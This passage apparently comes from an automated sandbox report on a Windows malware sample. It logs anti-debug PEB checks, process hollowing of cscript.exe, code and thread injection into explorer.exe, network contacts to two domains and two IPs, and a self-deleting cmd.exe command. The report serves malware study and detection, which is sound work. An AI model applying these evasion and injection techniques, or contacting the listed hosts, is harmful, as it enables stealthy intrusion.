            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04988CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04936CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04936CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04936CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_049714FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04937016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04937016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04937016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04984015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04984015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0498740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0498740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0498740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04972073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04981074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04968DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_049441E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0493A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04988D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048F3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04933540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_049346A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04980EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04980EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04980EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048F8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04988ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0496FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048D3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0496FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04944257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048F927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0496B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0496B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04988A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04937794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04937794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04937794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0496D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048C8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0497138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04985BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048F37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0497131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0498070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0498070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048DF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04988B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048BDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048CFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04988F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Code function: 5_2_0040ACC0 LdrLoadDll,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe	Domain query: www.dorotajedrusik.com
            Source: C:\Windows\explorer.exe	Domain query: www.noseainsight.com
            Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80
            Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1C0000
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign process
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Memory written: C:\Users\user\Desktop\z7d1ehQQQW.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Thread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Thread register set: target process: 3424
            Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 3424
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Process created: C:\Users\user\Desktop\z7d1ehQQQW.exe C:\Users\user\Desktop\z7d1ehQQQW.exe
            Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: explorer.exe, 00000006.00000000.676817795.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmp	Binary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmp	Binary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.689219732.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Users\user\Desktop\z7d1ehQQQW.exe VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
